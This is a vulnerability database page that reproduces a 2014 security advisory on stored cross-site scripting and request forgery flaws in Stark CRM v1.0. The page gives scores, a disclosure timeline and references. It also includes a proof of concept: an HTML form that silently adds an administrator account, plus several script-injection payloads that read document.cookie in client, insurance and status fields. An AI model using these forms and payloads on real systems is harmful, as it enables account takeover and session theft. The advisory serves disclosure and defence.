Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2014-5169
HistoryFeb 20, 2014 - 12:00 a.m.

Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities

2014-02-2000:00:00
Gjoko Krstic
zeroscience.mk
48

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.2 Medium

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.7%

JSON

Title: Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities
Advisory ID: ZSL-2014-5169
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 20.02.2014

Summary

This is a light weight CRM which simplifies process of managing staff, client and projects.

Description

Multiple stored XSS and CSRF vulnerabilities exist when parsing user input to several POST parameters. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site and/or execute arbitrary HTML and script code in a user’s browser session.

Vendor

IWCn Systems Inc. - <http://www.iwcn.ws>

Affected Version

1.0

Tested On

Nginx, PHP, MySQL

Vendor Status

[03.02.2014] Vulnerabilities discovered.
[07.02.2014] Vendor notified with sent details.
[07.02.2014] Vendor confirms issues, started developing patch.
[17.02.2014] Asked vendor for status update.
[19.02.2014] No response from the vendor.
[20.02.2014] Public security advisory released.

PoC

starkcrm_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.exploit-db.com/exploits/31792/&gt;
[2] <http://cxsecurity.com/issue/WLB-2014020174&gt;
[3] <http://packetstormsecurity.com/files/125331&gt;
[4] <http://www.securityfocus.com/bid/65710&gt;
[5] <http://osvdb.org/show/osvdb/103588&gt;
[6] <http://osvdb.org/show/osvdb/103589&gt;
[7] <http://osvdb.org/show/osvdb/103590&gt;
[8] <http://osvdb.org/show/osvdb/103591&gt;
[9] <http://osvdb.org/show/osvdb/103592&gt;
[10] <http://secunia.com/advisories/57048/&gt;
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-10008&gt;
[12] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-10008&gt;
[13] <http://xforce.iss.net/xforce/xfdb/91268&gt;
[14] <http://xforce.iss.net/xforce/xfdb/91267&gt;
[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-10009&gt;
[16] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-10009&gt;

Changelog

[20.02.2014] - Initial release
[21.02.2014] - Added reference [3]
[22.02.2014] - Added reference [4], [5], [6], [7], [8] and [9]
[28.02.2014] - Added reference [10]
[26.01.2015] - Added reference [11], [12], [13], [14], [15] and [16]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities


Vendor: IWCn Systems Inc.
Product web page: http://www.iwcn.ws
Affected version: 1.0

Summary: This is a light weight CRM which simplifies process
of managing staff, client and projects.

Desc: Multiple stored XSS and CSRF vulnerabilities exist when
parsing user input to several POST parameters. The application
allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This
can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site and/or
execute arbitrary HTML and script code in a user's browser session.

Tested on: Nginx, PHP, MySQL


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5169
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5169.php


03.02.2014

--


CSRF (Add Admin):
################


<!--
http://lab17.zeroscience.mk/testing/index.php?page=admin     - Add Admin
http://lab17.zeroscience.mk/testing/index.php?page=agent     - Add Agent
http://lab17.zeroscience.mk/testing/index.php?page=sub_agent - Add Sub-Agent
http://lab17.zeroscience.mk/testing/index.php?page=partner   - Add Partner
http://lab17.zeroscience.mk/testing/index.php?page=client    - Add Client
-->
</p>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=admin" method="POST">
<input name="first_name" type="hidden" value="Admin101"/>
<input name="last_name" type="hidden" value="Admin202"/>
<input name="comp_name" type="hidden" value="Zero Science Lab"/>
<input name="email" type="hidden" value="[email protected]"/>
<input name="pwd" type="hidden" value="123456"/>
<input name="phonep" type="hidden" value="(111) 111-1111"/>
<input name="phoneg" type="hidden" value="(111) 111-1111"/>
<input name="notes" type="hidden" value="Testing2 Address 101"/>
<input name="zip" type="hidden" value="11111"/>
<input name="ahv" type="hidden" value="11111"/>
<input name="date" type="hidden" value="03.02.2014"/>
<input name="gender" type="hidden" value="female"/>
<input name="f_status" type="hidden" value="Married"/>
<input name="detail" type="hidden" value="Testing3 personal detailz"/>
<input name="submit" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>
  





Stored XSS (parameter: name):
############################

POST /testing/index.php?page=add_ticket HTTP/1.1
Host: lab17.zeroscience.mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lab17.zeroscience.mk/testing/index.php?page=add_ticket
Cookie: PHPSESSID=51422dfc2ef2d3569e778d06d20c7a25
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------94321629522129
Content-Length: 592

-----------------------------94321629522129
Content-Disposition: form-data; name="name"

"&gt;<script>alert(1);</script>
-----------------------------94321629522129
Content-Disposition: form-data; name="project"

1
-----------------------------94321629522129
Content-Disposition: form-data; name="description"

ZSL
-----------------------------94321629522129
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------94321629522129
Content-Disposition: form-data; name="submit"


-----------------------------94321629522129--




Stored XSS (parameters: first_name, last_name, notes):
#####################################################


  
    <form action="http://lab17.zeroscience.mk/testing/index.php?page=client" method="POST">
<input name="first_name" type="hidden" value='"&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;'/>
<input name="last_name" type="hidden" value='"&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;'/>
<input name="comp_name" type="hidden" value="Zero Science Lab"/>
<input name="email" type="hidden" value="[email protected]"/>
<input name="pwd" type="hidden" value="test"/>
<input name="phonep" type="hidden" value="(111) 111-1111"/>
<input name="phoneg" type="hidden" value="(111) 111-1111"/>
<input name="notes" type="hidden" value='"&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;'/>
<input name="zip" type="hidden" value="00000"/>
<input name="ahv" type="hidden" value="test2"/>
<input name="date" type="hidden" value="03.02.2014"/>
<input name="gender" type="hidden" value="male"/>
<input name="f_status" type="hidden" value="Single"/>
<input name="detail" type="hidden" value="test"/>
<input name="submit" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>
  





Stored XSS (parameters: insu_name, price):
#########################################


  
    <form action="http://lab17.zeroscience.mk/testing/index.php?page=add_insurance_cat" method="POST">
<input name="insu_name" type="hidden" value='"&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;'/>
<input name="price" type="hidden" value='"&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;'/>
<input name="submit" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>
  





Stored XSS (parameter: status[]):
################################


  
    <form action="http://lab17.zeroscience.mk/testing/index.php?page=add_status" method="POST">
<input name="status[]" type="hidden" value='"&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;'/>
<input name="submit" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>
</body></html>

Related

cve 2
prion 2
cvelist 2
nvd 2
cve
cve
CVE-2014-10008
2015-01-13 11:59:17
CVE-2014-10009
2015-01-13 11:59:18
prion
prion
Cross site request forgery (csrf)
2015-01-13 11:59:00
Cross site scripting
2015-01-13 11:59:00
cvelist
cvelist
CVE-2014-10008
2015-01-13 11:00:00
CVE-2014-10009
2015-01-13 11:00:00
nvd
nvd
CVE-2014-10008
2015-01-13 11:59:17
CVE-2014-10009
2015-01-13 11:59:18

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.2 Medium

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.7%

JSON
Related for ZSL-2014-5169
cve2prion2cvelist2nvd2